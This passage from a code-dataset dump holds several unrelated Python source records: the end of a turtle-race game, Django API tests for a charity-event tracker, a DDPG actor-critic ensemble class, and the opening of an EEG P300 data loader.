order.append(t[i][1])\r\n\r\n# Đưa rùa vào vị trí xuất phát\r\nfor i in range(turtleCount):\r\n t[order[i]][0].up()\r\n t[order[i]][0].goto(t[order[i]][2])\r\n t[order[i]][0].down()\r\n\r\n# Hàm kiểm tra tất cả con rùa đã hoàn thành cuộc đua chưa\r\n# TEST\r\ndef haveWeWon():\r\n sum = 0;\r\n for i in range(turtleCount): sum += t[i][9]\r\n if sum == turtleCount*raceCount:\r\n return True\r\n else:\r\n return False\r\n\r\n# Set timer cùng lúc\r\nfor i in range(turtleCount): \r\n t[order[i]][8] = perf_counter() # timer()\r\n\r\n# Bắt đầu đua\r\nwhile haveWeWon() == False:\r\n for i in range(turtleCount):\r\n t[order[i]] = MakeMove(t[order[i]], trackLength_Session)\r\n print(str(t[order[i]]) + ' ' + str(t[order[i]][0].distance(t[order[i]][2])))\r\n \r\n# Debug: hiện trạng thái của rùa sau khi kết thúc cuộc đua\r\nfor i in range(turtleCount): print(t[i])\r\n\r\n# Tìm rùa chiến thắng\r\nwinner = 0\r\nminRuntime = t[0][8] # lấy đại con đầu tiên làm chuẩn\r\nfor i in range(turtleCount):\r\n if t[i][8] < minRuntime:\r\n minRuntime = t[i][8]\r\n winner = i\r\nprint('%s has won the game.' % t[winner][3])\r\n\r\n# Vẽ bảng điểm\r\nfor i in range(turtleCount):\r\n t[i][0].clear()\r\nclear()\r\nfor i in range(turtleCount):\r\n t[i][0].up()\r\n t[i][0].goto(t[i][2][0]+2*trackDivPadding, t[i][2][1])\r\nDrawScoreboard(t)\r\n\r\ndone()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"37437917","text":"import datetime\nimport json\nimport random\n\nimport pytz\nfrom django.conf import settings\nfrom django.contrib.admin.models import (\n LogEntry,\n ADDITION as LogEntryADDITION,\n CHANGE as LogEntryCHANGE,\n DELETION as LogEntryDELETION,\n)\nfrom django.contrib.auth.models import User, Permission, AnonymousUser\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.core import serializers\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.test import TransactionTestCase, RequestFactory, override_settings\nfrom django.urls import reverse\n\nimport tracker.models as models\nimport tracker.randgen as randgen\nimport tracker.views.api\n\nnoon = datetime.time(12, 0)\ntoday = datetime.date.today()\ntoday_noon = datetime.datetime.combine(today, noon)\ntomorrow = today + datetime.timedelta(days=1)\ntomorrow_noon = datetime.datetime.combine(tomorrow, noon)\nlong_ago = today - datetime.timedelta(days=180)\nlong_ago_noon = datetime.datetime.combine(long_ago, noon)\n\n\ndef format_time(dt):\n return dt.astimezone(pytz.utc).isoformat()[:-6] + 'Z'\n\n\nclass APITestCase(TransactionTestCase):\n model_name = None\n encoder = DjangoJSONEncoder()\n\n def parseJSON(self, response, status_code=200):\n self.assertEqual(\n response.status_code,\n status_code,\n msg='Status code is not %d\\n\"\"\"%s\"\"\"' % (status_code, response.content),\n )\n try:\n return json.loads(response.content)\n except Exception as e:\n raise AssertionError(\n 'Could not parse json: %s\\n\"\"\"%s\"\"\"' % (e, response.content)\n )\n\n def assertModelPresent(self, expected_model, data):\n found_model = None\n for model in data:\n if (\n model['pk'] == expected_model['pk']\n and model['model'] == expected_model['model']\n ):\n found_model = model\n break\n if not found_model:\n raise AssertionError(\n 'Could not find model \"%s:%s\" in data'\n % (expected_model['model'], expected_model['pk'])\n )\n extra_keys = set(found_model['fields'].keys()) - set(\n 
expected_model['fields'].keys()\n )\n missing_keys = set(expected_model['fields'].keys()) - set(\n found_model['fields'].keys()\n )\n unequal_keys = [\n k\n for k in list(expected_model['fields'].keys())\n if k in found_model['fields']\n and found_model['fields'][k] != expected_model['fields'][k]\n ]\n problems = (\n ['Extra key: \"%s\"' % k for k in extra_keys]\n + ['Missing key: \"%s\"' % k for k in missing_keys]\n + [\n 'Value for key \"%s\" unequal: %r != %r'\n % (k, expected_model['fields'][k], found_model['fields'][k])\n for k in unequal_keys\n ]\n )\n if problems:\n raise AssertionError(\n 'Model \"%s:%s\" was incorrect:\\n%s'\n % (expected_model['model'], expected_model['pk'], '\\n'.join(problems))\n )\n\n def assertModelNotPresent(self, unexpected_model, data):\n found_model = None\n for model in data:\n if (\n model['pk'] == unexpected_model['pk']\n and model['model'] == unexpected_model['model']\n ):\n found_model = model\n break\n if not found_model:\n raise AssertionError(\n 'Found model \"%s:%s\" in data'\n % (unexpected_model['model'], unexpected_model['pk'])\n )\n\n def setUp(self):\n self.factory = RequestFactory()\n self.locked_event = models.Event.objects.create(\n datetime=long_ago_noon, targetamount=5, short='locked', name='Locked Event'\n )\n self.event = models.Event.objects.create(\n datetime=today_noon, targetamount=5, short='event', name='Test Event'\n )\n self.anonymous_user = AnonymousUser()\n self.user = User.objects.create(username='test')\n self.add_user = User.objects.create(username='add')\n self.locked_user = User.objects.create(username='locked')\n self.locked_user.user_permissions.add(\n Permission.objects.get(name='Can edit locked events')\n )\n if self.model_name:\n self.add_user.user_permissions.add(\n Permission.objects.get(name='Can add %s' % self.model_name),\n Permission.objects.get(name='Can change %s' % self.model_name),\n )\n self.locked_user.user_permissions.add(\n Permission.objects.get(name='Can add %s' % self.model_name),\n Permission.objects.get(name='Can change %s' % self.model_name),\n )\n self.super_user = User.objects.create(username='super', is_superuser=True)\n self.maxDiff = None\n\n\nclass TestGeneric(APITestCase):\n \"\"\"generic cases that could apply to any class, even if they use a specific one for testing purposes\"\"\"\n\n def test_add_with_bad_type(self):\n request = self.factory.post('/api/v1/add', dict(type='nonsense'))\n request.user = self.super_user\n data = self.parseJSON(tracker.views.api.add(request), status_code=400)\n self.assertEqual('Malformed Parameters', data['error'])\n\n def test_add_with_bad_field(self):\n request = self.factory.post(\n '/api/v1/add', dict(type='run', nonsense='nonsense')\n )\n request.user = self.super_user\n data = self.parseJSON(tracker.views.api.add(request), status_code=400)\n self.assertEqual('Field does not exist', data['error'])\n\n @override_settings(TRACKER_PAGINATION_LIMIT=20)\n def test_search_with_offset_and_limit(self):\n rand = random.Random()\n event = randgen.generate_event(rand, today_noon)\n event.save()\n randgen.generate_runs(rand, event, 5)\n randgen.generate_donations(rand, event, 50, transactionstate='COMPLETED')\n request = self.factory.get(\n '/api/v1/search', dict(type='donation', offset=10, limit=10),\n )\n request.user = self.anonymous_user\n data = self.parseJSON(tracker.views.api.search(request))\n donations = models.Donation.objects.all()\n self.assertEqual(len(data), 10)\n self.assertListEqual([d['pk'] for d in data], [d.id for d in donations[10:20]])\n\n 
request = self.factory.get('/api/v1/search', dict(type='donation', limit=30),)\n request.user = self.anonymous_user\n data = self.parseJSON(tracker.views.api.search(request))\n # settings wins if too many are requested\n self.assertEqual(len(data), settings.TRACKER_PAGINATION_LIMIT)\n\n def test_add_log(self):\n request = self.factory.post(\n '/api/v1/add',\n dict(type='runner', name='trihex', stream='https://twitch.tv/trihex'),\n )\n request.user = self.super_user\n data = self.parseJSON(tracker.views.api.add(request))\n runner = models.Runner.objects.get(pk=data[0]['pk'])\n add_entry = LogEntry.objects.order_by('-pk')[1]\n self.assertEqual(int(add_entry.object_id), runner.id)\n self.assertEqual(\n add_entry.content_type, ContentType.objects.get_for_model(models.Runner)\n )\n self.assertEqual(add_entry.action_flag, LogEntryADDITION)\n change_entry = LogEntry.objects.order_by('-pk')[0]\n self.assertEqual(int(change_entry.object_id), runner.id)\n self.assertEqual(\n change_entry.content_type, ContentType.objects.get_for_model(models.Runner)\n )\n self.assertEqual(change_entry.action_flag, LogEntryCHANGE)\n self.assertIn('Set name to \"%s\".' % runner.name, change_entry.change_message)\n self.assertIn(\n 'Set stream to \"%s\".' % runner.stream, change_entry.change_message\n )\n\n def test_change_log(self):\n old_runner = models.Runner.objects.create(name='PJ', youtube='TheSuperSNES')\n request = self.factory.post(\n '/api/v1/edit',\n dict(\n type='runner',\n id=old_runner.id,\n name='trihex',\n stream='https://twitch.tv/trihex',\n youtube='',\n ),\n )\n request.user = self.super_user\n data = self.parseJSON(tracker.views.api.edit(request))\n runner = models.Runner.objects.get(pk=data[0]['pk'])\n entry = LogEntry.objects.order_by('pk').last()\n self.assertEqual(int(entry.object_id), runner.id)\n self.assertEqual(\n entry.content_type, ContentType.objects.get_for_model(models.Runner)\n )\n self.assertEqual(entry.action_flag, LogEntryCHANGE)\n self.assertIn(\n 'Changed name from \"%s\" to \"%s\".' % (old_runner.name, runner.name),\n entry.change_message,\n )\n self.assertIn(\n 'Changed stream from empty to \"%s\".' % runner.stream, entry.change_message\n )\n self.assertIn(\n 'Changed youtube from \"%s\" to empty.' % old_runner.youtube,\n entry.change_message,\n )\n\n def test_change_log_m2m(self):\n run = models.SpeedRun.objects.create(name='Test Run', run_time='0:15:00')\n runner1 = models.Runner.objects.create(name='PJ')\n runner2 = models.Runner.objects.create(name='trihex')\n request = self.factory.post(\n '/api/v1/edit',\n dict(type='run', id=run.id, runners='%s,%s' % (runner1.name, runner2.name)),\n )\n request.user = self.super_user\n self.parseJSON(tracker.views.api.edit(request))\n entry = LogEntry.objects.order_by('pk').last()\n self.assertEqual(int(entry.object_id), run.id)\n self.assertEqual(\n entry.content_type, ContentType.objects.get_for_model(models.SpeedRun)\n )\n self.assertEqual(entry.action_flag, LogEntryCHANGE)\n self.assertIn(\n 'Changed runners from empty to \"%s\".' 
% ([str(runner1), str(runner2)],),\n entry.change_message,\n )\n\n def test_delete_log(self):\n old_runner = models.Runner.objects.create(name='PJ', youtube='TheSuperSNES')\n request = self.factory.post(\n '/api/v1/delete', dict(type='runner', id=old_runner.id)\n )\n request.user = self.super_user\n self.parseJSON(tracker.views.api.delete(request))\n self.assertFalse(models.Runner.objects.filter(pk=old_runner.pk).exists())\n entry = LogEntry.objects.order_by('pk').last()\n self.assertEqual(int(entry.object_id), old_runner.id)\n self.assertEqual(\n entry.content_type, ContentType.objects.get_for_model(models.Runner)\n )\n self.assertEqual(entry.action_flag, LogEntryDELETION)\n\n\nclass TestSpeedRun(APITestCase):\n model_name = 'Speed Run'\n\n def setUp(self):\n super(TestSpeedRun, self).setUp()\n self.run1 = models.SpeedRun.objects.create(\n name='Test Run',\n category='test%',\n giantbomb_id=0x5EADBEEF,\n console='NES',\n run_time='0:45:00',\n setup_time='0:05:00',\n release_year=1988,\n description='Foo',\n commentators='blechy',\n order=1,\n tech_notes='This run requires an LCD with 0.58ms of lag for a skip late in the game',\n coop=True,\n )\n self.run2 = models.SpeedRun.objects.create(\n name='Test Run 2', run_time='0:15:00', setup_time='0:05:00', order=2\n )\n self.run3 = models.SpeedRun.objects.create(\n name='Test Run 3', run_time='0:20:00', setup_time='0:05:00', order=None\n )\n self.run4 = models.SpeedRun.objects.create(\n name='Test Run 4', run_time='0:05:00', setup_time='0', order=3\n )\n self.runner1 = models.Runner.objects.create(name='trihex')\n self.runner2 = models.Runner.objects.create(name='PJ')\n self.run1.runners.add(self.runner1)\n self.event2 = models.Event.objects.create(\n datetime=tomorrow_noon, targetamount=5, short='event2',\n )\n self.run5 = models.SpeedRun.objects.create(\n name='Test Run 5',\n run_time='0:05:00',\n setup_time='0',\n order=1,\n event=self.event2,\n )\n\n @classmethod\n def format_run(cls, run):\n return dict(\n fields=dict(\n canonical_url=(\n 'http://testserver' + reverse('tracker:run', args=(run.id,))\n ),\n category=run.category,\n commentators=run.commentators,\n console=run.console,\n coop=run.coop,\n deprecated_runners=run.deprecated_runners,\n description=run.description,\n display_name=run.display_name,\n endtime=format_time(run.endtime) if run.endtime else run.endtime,\n event=run.event.id,\n giantbomb_id=run.giantbomb_id,\n name=run.name,\n order=run.order,\n public=str(run),\n release_year=run.release_year,\n run_time=run.run_time,\n runners=[runner.id for runner in run.runners.all()],\n setup_time=run.setup_time,\n starttime=format_time(run.starttime)\n if run.starttime\n else run.starttime,\n twitch_name=run.twitch_name,\n ),\n model='tracker.speedrun',\n pk=run.id,\n )\n\n def test_get_single_run(self):\n request = self.factory.get('/api/v1/search', dict(type='run', id=self.run1.id))\n request.user = self.user\n data = self.parseJSON(tracker.views.api.search(request))\n self.assertEqual(len(data), 1)\n expected = self.format_run(self.run1)\n self.assertEqual(data[0], expected)\n\n def test_get_event_runs(self):\n request = self.factory.get(\n '/api/v1/search', dict(type='run', event=self.run1.event_id)\n )\n request.user = self.user\n data = self.parseJSON(tracker.views.api.search(request))\n self.assertEqual(len(data), 4)\n self.assertModelPresent(self.format_run(self.run1), data)\n self.assertModelPresent(self.format_run(self.run2), data)\n self.assertModelPresent(self.format_run(self.run3), data)\n 
self.assertModelPresent(self.format_run(self.run4), data)\n\n def test_get_starttime_lte(self):\n request = self.factory.get(\n '/api/v1/search',\n dict(type='run', starttime_lte=format_time(self.run2.starttime)),\n )\n request.user = self.user\n data = self.parseJSON(tracker.views.api.search(request))\n self.assertEqual(len(data), 2)\n self.assertModelPresent(self.format_run(self.run1), data)\n self.assertModelPresent(self.format_run(self.run2), data)\n\n def test_get_starttime_gte(self):\n request = self.factory.get(\n '/api/v1/search',\n dict(type='run', starttime_gte=format_time(self.run2.starttime)),\n )\n request.user = self.user\n data = self.parseJSON(tracker.views.api.search(request))\n self.assertEqual(len(data), 3)\n self.assertModelPresent(self.format_run(self.run2), data)\n self.assertModelPresent(self.format_run(self.run4), data)\n self.assertModelPresent(self.format_run(self.run5), data)\n\n def test_get_endtime_lte(self):\n request = self.factory.get(\n '/api/v1/search',\n dict(type='run', endtime_lte=format_time(self.run2.endtime)),\n )\n request.user = self.user\n data = self.parseJSON(tracker.views.api.search(request))\n self.assertEqual(len(data), 2)\n self.assertModelPresent(self.format_run(self.run1), data)\n self.assertModelPresent(self.format_run(self.run2), data)\n\n def test_get_endtime_gte(self):\n request = self.factory.get(\n '/api/v1/search',\n dict(type='run', endtime_gte=format_time(self.run2.endtime)),\n )\n request.user = self.user\n data = self.parseJSON(tracker.views.api.search(request))\n self.assertEqual(len(data), 3)\n self.assertModelPresent(self.format_run(self.run2), data)\n self.assertModelPresent(self.format_run(self.run4), data)\n self.assertModelPresent(self.format_run(self.run5), data)\n\n def test_add_with_category(self):\n request = self.factory.post(\n '/api/v1/add',\n dict(\n type='run',\n name='Added Run With Category',\n run_time='0:15:00',\n setup_time='0:05:00',\n category='100%',\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.add(request))\n self.assertEqual(len(data), 1)\n self.assertEqual(models.SpeedRun.objects.get(pk=data[0]['pk']).category, '100%')\n\n def test_edit_with_category(self):\n request = self.factory.post(\n '/api/v1/edit', dict(type='run', id=self.run2.id, category='100%')\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.edit(request))\n self.assertEqual(len(data), 1)\n self.assertEqual(models.SpeedRun.objects.get(pk=data[0]['pk']).category, '100%')\n\n def test_add_with_runners_as_ids(self):\n request = self.factory.post(\n '/api/v1/add',\n dict(\n type='run',\n name='Added Run With Runners',\n runners='%d,%d' % (self.runner1.id, self.runner2.id),\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.add(request))\n self.assertEqual(len(data), 1)\n self.assertSetEqual(\n set(models.SpeedRun.objects.get(pk=data[0]['pk']).runners.all()),\n {self.runner1, self.runner2},\n )\n\n def test_add_with_runners_as_invalid_ids(self):\n request = self.factory.post(\n '/api/v1/add',\n dict(\n type='run',\n name='Added Run With Runners',\n runners='%d,%d' % (self.runner1.id, 6666),\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.add(request), status_code=400)\n self.assertEqual('Foreign Key relation could not be found', data['error'])\n\n def test_add_with_runners_as_json_ids(self):\n request = self.factory.post(\n '/api/v1/add',\n dict(\n type='run',\n name='Added Run With Runners',\n 
runners=json.dumps([self.runner1.id, self.runner2.id]),\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.add(request))\n self.assertEqual(len(data), 1)\n self.assertSetEqual(\n set(models.SpeedRun.objects.get(pk=data[0]['pk']).runners.all()),\n {self.runner1, self.runner2},\n )\n\n def test_add_with_runners_as_names(self):\n request = self.factory.post(\n '/api/v1/add',\n dict(\n type='run',\n name='Added Run With Runners',\n runners='%s,%s'\n % (self.runner1.name.upper(), self.runner2.name.lower()),\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.add(request))\n self.assertEqual(len(data), 1)\n self.assertSetEqual(\n set(models.SpeedRun.objects.get(pk=data[0]['pk']).runners.all()),\n {self.runner1, self.runner2},\n )\n\n def test_add_with_runners_as_json_names(self):\n request = self.factory.post(\n '/api/v1/add',\n dict(\n type='run',\n name='Added Run With Runners',\n runners=json.dumps(\n [self.runner1.name.upper(), self.runner2.name.lower()]\n ),\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.add(request))\n self.assertEqual(len(data), 1)\n self.assertSetEqual(\n set(models.SpeedRun.objects.get(pk=data[0]['pk']).runners.all()),\n {self.runner1, self.runner2},\n )\n\n def test_add_with_runners_as_json_natural_keys(self):\n request = self.factory.post(\n '/api/v1/add',\n dict(\n type='run',\n name='Added Run With Runners',\n runners=json.dumps(\n [self.runner1.natural_key(), self.runner2.natural_key()]\n ),\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.add(request))\n self.assertEqual(len(data), 1)\n self.assertSetEqual(\n set(models.SpeedRun.objects.get(pk=data[0]['pk']).runners.all()),\n {self.runner1, self.runner2},\n )\n\n def test_add_with_runners_as_names_invalid(self):\n request = self.factory.post(\n '/api/v1/add',\n dict(\n type='run',\n name='Added Run With Runners',\n runners='%s,%s' % (self.runner1.name, 'nonsense'),\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.add(request), status_code=400)\n self.assertEqual('Foreign Key relation could not be found', data['error'])\n\n def test_edit_with_runners_as_ids(self):\n request = self.factory.post(\n '/api/v1/edit',\n dict(\n type='run',\n id=self.run2.id,\n runners='%d,%d' % (self.runner1.id, self.runner2.id),\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.edit(request))\n self.assertEqual(len(data), 1)\n self.assertSetEqual(\n set(models.SpeedRun.objects.get(pk=data[0]['pk']).runners.all()),\n {self.runner1, self.runner2},\n )\n\n def test_edit_with_runners_as_json_ids(self):\n request = self.factory.post(\n '/api/v1/edit',\n dict(\n type='run',\n id=self.run2.id,\n runners=json.dumps([self.runner1.id, self.runner2.id]),\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.edit(request))\n self.assertEqual(len(data), 1)\n self.assertSetEqual(\n set(models.SpeedRun.objects.get(pk=data[0]['pk']).runners.all()),\n {self.runner1, self.runner2},\n )\n\n def test_edit_with_runners_as_ids_invalid(self):\n request = self.factory.post(\n '/api/v1/edit',\n dict(\n type='run', id=self.run2.id, runners='%d,%d' % (self.runner1.id, 6666)\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.edit(request), status_code=400)\n self.assertEqual('Foreign Key relation could not be found', data['error'])\n\n def test_edit_with_runners_as_names(self):\n request = self.factory.post(\n 
'/api/v1/edit',\n dict(\n type='run',\n id=self.run2.id,\n runners='%s,%s'\n % (self.runner1.name.upper(), self.runner2.name.lower()),\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.edit(request))\n self.assertEqual(len(data), 1)\n self.assertSetEqual(\n set(models.SpeedRun.objects.get(pk=data[0]['pk']).runners.all()),\n {self.runner1, self.runner2},\n )\n\n def test_edit_with_runners_as_json_names(self):\n request = self.factory.post(\n '/api/v1/edit',\n dict(\n type='run',\n id=self.run2.id,\n runners=json.dumps(\n [self.runner1.name.upper(), self.runner2.name.lower()]\n ),\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.edit(request))\n self.assertEqual(len(data), 1)\n self.assertSetEqual(\n set(models.SpeedRun.objects.get(pk=data[0]['pk']).runners.all()),\n {self.runner1, self.runner2},\n )\n\n def test_edit_with_runners_as_json_natural_keys(self):\n request = self.factory.post(\n '/api/v1/edit',\n dict(\n type='run',\n id=self.run2.id,\n runners=json.dumps(\n [self.runner1.natural_key(), self.runner2.natural_key()]\n ),\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.edit(request))\n self.assertEqual(len(data), 1)\n self.assertSetEqual(\n set(models.SpeedRun.objects.get(pk=data[0]['pk']).runners.all()),\n {self.runner1, self.runner2},\n )\n\n def test_edit_with_runners_as_names_invalid(self):\n request = self.factory.post(\n '/api/v1/edit',\n dict(\n type='run',\n id=self.run2.id,\n runners='%s,%s' % (self.runner1.name, 'nonsense'),\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.edit(request), status_code=400)\n self.assertEqual('Foreign Key relation could not be found', data['error'])\n\n def test_tech_notes(self):\n request = self.factory.get('/api/v1/search', dict(type='run', id=self.run1.id))\n request.user = self.user\n self.user.user_permissions.add(\n Permission.objects.get(name='Can view tech notes')\n )\n data = self.parseJSON(tracker.views.api.search(request))\n expected = self.format_run(self.run1)\n expected['fields']['tech_notes'] = self.run1.tech_notes\n self.assertEqual(data[0], expected)\n\n\nclass TestRunner(APITestCase):\n model_name = 'runner'\n\n def setUp(self):\n super(TestRunner, self).setUp()\n self.runner = models.Runner.objects.create(name='lower')\n\n @classmethod\n def format_runner(cls, runner):\n return dict(\n fields=dict(\n donor=runner.donor.visible_name() if runner.donor else None,\n public=runner.name,\n name=runner.name,\n stream=runner.stream,\n twitter=runner.twitter,\n youtube=runner.youtube,\n platform=runner.platform,\n pronouns=runner.pronouns,\n ),\n model='tracker.runner',\n pk=runner.id,\n )\n\n def test_name_case_insensitive_search(self):\n request = self.factory.get(\n '/api/v1/search', dict(type='runner', name=self.runner.name.upper())\n )\n request.user = self.user\n data = self.parseJSON(tracker.views.api.search(request))\n expected = self.format_runner(self.runner)\n self.assertEqual(data[0], expected)\n\n def test_name_case_insensitive_add(self):\n request = self.factory.get(\n '/api/v1/add', dict(type='runner', name=self.runner.name.upper())\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.add(request), status_code=400)\n self.assertRegexpMatches(\n data['messages'][0], 'case-insensitive.*already exists'\n )\n\n\nclass TestPrize(APITestCase):\n model_name = 'prize'\n\n def setUp(self):\n super(TestPrize, self).setUp()\n\n @classmethod\n def format_prize(cls, prize):\n 
def add_run_fields(fields, run, prefix):\n dumped_run = json.loads(serializers.serialize('json', [run]))[0]\n for key, value in dumped_run['fields'].items():\n if key in ['event', 'giantbomb_id', 'runners']:\n continue\n fields[prefix + '__' + key] = value\n fields[prefix + '__public'] = str(run)\n\n run_fields = {}\n if prize.startrun:\n add_run_fields(run_fields, prize.startrun, 'startrun')\n add_run_fields(run_fields, prize.endrun, 'endrun')\n draw_time_fields = {}\n if prize.has_draw_time():\n draw_time_fields['start_draw_time'] = cls.encoder.default(\n prize.start_draw_time()\n )\n draw_time_fields['end_draw_time'] = cls.encoder.default(\n prize.end_draw_time()\n )\n\n return dict(\n fields=dict(\n allowed_prize_countries=[\n c.id for c in prize.allowed_prize_countries.all()\n ],\n disallowed_prize_regions=[\n r.id for r in prize.disallowed_prize_regions.all()\n ],\n public=prize.name,\n name=prize.name,\n canonical_url=(\n 'http://testserver' + reverse('tracker:prize', args=(prize.id,))\n ),\n category=prize.category_id,\n image=prize.image,\n altimage=prize.altimage,\n imagefile=prize.imagefile.url if prize.imagefile else '',\n description=prize.description,\n shortdescription=prize.shortdescription,\n creator=prize.creator,\n creatoremail=prize.creatoremail,\n creatorwebsite=prize.creatorwebsite,\n handler=prize.handler_id,\n key_code=prize.key_code,\n provider=prize.provider,\n maxmultiwin=prize.maxmultiwin,\n maxwinners=prize.maxwinners,\n numwinners=str(len(prize.get_prize_winners())),\n requiresshipping=prize.requiresshipping,\n custom_country_filter=prize.custom_country_filter,\n estimatedvalue=prize.estimatedvalue,\n minimumbid=str(prize.minimumbid),\n maximumbid=str(prize.maximumbid),\n sumdonations=prize.sumdonations,\n randomdraw=prize.randomdraw,\n event=prize.event_id,\n startrun=prize.startrun_id,\n endrun=prize.endrun_id,\n starttime=prize.starttime,\n endtime=prize.endtime,\n **run_fields,\n **draw_time_fields,\n ),\n model='tracker.prize',\n pk=prize.id,\n )\n\n def test_search(self):\n models.SpeedRun.objects.create(\n event=self.event,\n name='Test Run',\n run_time='5:00',\n setup_time='5:00',\n order=1,\n ).clean()\n prize = models.Prize.objects.create(\n event=self.event,\n handler=self.add_user,\n name='Prize With Image',\n state='ACCEPTED',\n startrun=self.event.speedrun_set.first(),\n endrun=self.event.speedrun_set.first(),\n image='https://example.com/example.jpg',\n )\n prize.refresh_from_db()\n request = self.factory.get('/api/v1/search', dict(type='prize',),)\n request.user = self.user\n data = self.parseJSON(tracker.views.api.search(request))\n self.assertEqual(len(data), 1)\n self.assertEqual(data[0], self.format_prize(prize))\n\n def test_search_with_imagefile(self):\n from django.core.files.uploadedfile import SimpleUploadedFile\n\n models.SpeedRun.objects.create(\n event=self.event,\n name='Test Run',\n run_time='5:00',\n setup_time='5:00',\n order=1,\n ).clean()\n prize = models.Prize.objects.create(\n event=self.event,\n handler=self.add_user,\n name='Prize With Image',\n state='ACCEPTED',\n startrun=self.event.speedrun_set.first(),\n endrun=self.event.speedrun_set.first(),\n imagefile=SimpleUploadedFile('test.jpg', b''),\n )\n prize.refresh_from_db()\n request = self.factory.get('/api/v1/search', dict(type='prize',),)\n request.user = self.user\n data = self.parseJSON(tracker.views.api.search(request))\n self.assertEqual(len(data), 1)\n self.assertEqual(data[0], self.format_prize(prize))\n\n def test_add_with_new_category(self):\n 
self.add_user.user_permissions.add(\n Permission.objects.get(name='Can add Prize Category')\n )\n request = self.factory.post(\n '/api/v1/add',\n dict(\n type='prize',\n name='Added Prize With Category',\n event=json.dumps(self.event.natural_key()),\n handler=json.dumps(self.add_user.natural_key()),\n category='Grand',\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.add(request))\n prize = models.Prize.objects.get(pk=data[0]['pk'])\n self.assertEqual(len(data), 1)\n # TODO: add and search don't format the same\n # self.assertEqual(data[0], self.format_prize(prize))\n self.assertEqual(\n prize.category, models.PrizeCategory.objects.get(name='Grand'),\n )\n\n def test_add_with_new_category_without_category_add_permission(self):\n request = self.factory.post(\n '/api/v1/add',\n dict(\n type='prize',\n name='Added Prize With Category',\n event=json.dumps(self.event.natural_key()),\n handler=json.dumps(self.add_user.natural_key()),\n category='Grand',\n ),\n )\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.add(request), status_code=400)\n self.assertEqual('Foreign Key relation could not be found', data['error'])\n\n\nclass TestEvent(APITestCase):\n model_name = 'event'\n\n def setUp(self):\n super(TestEvent, self).setUp()\n\n def test_event_annotations(self):\n models.Donation.objects.create(event=self.event, amount=10, domainId='123456')\n models.Donation.objects.create(\n event=self.event, amount=5, domainId='123457', transactionstate='COMPLETED'\n )\n request = self.factory.get('/api/v1/search', dict(type='event'))\n request.user = self.add_user\n data = self.parseJSON(tracker.views.api.search(request))\n self.assertEqual(len(data), 2)\n event_data = next(e for e in data if e['pk'] == self.locked_event.id)['fields']\n self.assertEqual(event_data['amount'], '0.00')\n self.assertEqual(event_data['count'], '0')\n self.assertEqual(event_data['max'], '0.00')\n self.assertEqual(event_data['avg'], '0.0')\n event_data = next(e for e in data if e['pk'] == self.event.id)['fields']\n self.assertEqual(event_data['amount'], '5.00')\n self.assertEqual(event_data['count'], '1')\n self.assertEqual(event_data['max'], '5.00')\n self.assertEqual(event_data['avg'], '5.0')\n","sub_path":"tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":35235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"331103770","text":"import numpy as np\nfrom util import *\nfrom ddpg import DDPG\n\nclass ACE:\n def __init__(self, nb_status, nb_actions, args):\n self.ensemble = []\n self.num = args.ace\n self.iter = 0\n for i in range(self.num):\n self.ensemble.append(DDPG(nb_status, nb_actions, args))\n self.discrete = args.discrete\n\n def __call__(self, st):\n status = []\n actions = []\n tot_score = []\n for i in range(self.num):\n if i >= self.iter: break\n action = self.ensemble[i].select_action(st, return_fix=True)\n actions.append(action)\n status.append(st)\n tot_score.append(0.)\n\n for i in range(self.num):\n if i >= self.iter: break\n self.ensemble[i].eval()\n score = self.ensemble[i].critic([\n to_tensor(np.array(status), volatile=True), to_tensor(np.array(actions), volatile=True)\n ])\n for j in range(self.num):\n if j >= self.iter: break\n tot_score[j] += score.data[j][0]\n self.ensemble[i].train()\n \n best = np.array(tot_score).argmax()\n if self.discrete:\n return actions[best].argmax()\n return actions[best]\n\n def append(self, output, num):\n self.ensemble[self.iter % 
self.num].load_weights(output, num)\n self.iter += 1\n\n def load(self, output):\n for i in range(self.num):\n self.ensemble[i].load_weights(output)\n","sub_path":"DeepWNCS/pytorch-gym-master/ensemble/base.ensemblev2/ACE.py","file_name":"ACE.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"363210086","text":"# -*- coding: utf-8 -*-\nfrom __future__ import division\nimport numpy as np\nimport math\nfrom scipy.signal import butter, lfilter, freqz\nimport matplotlib.pyplot as plt\nfrom scipy import signal\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\ndef get_subdataset(_S, Sess):\n _file = 'P300/train/Data_S%02d_Sess%02d.csv' % (_S, Sess)\n _f = open(_file).readlines()\n channels = []\n for i, _rows in enumerate(_f):\n if i > 0:\n channels.append(eval(_rows))\n else:\n _headers = _rows\n if i > 11000:\n return np.array(channels)\n return np.array(channels)\n\n\ndef get_samples(_index, s_s_chs, sr, _size=1.3):\n return s_s_chs[_index:int(math.ceil(_index + 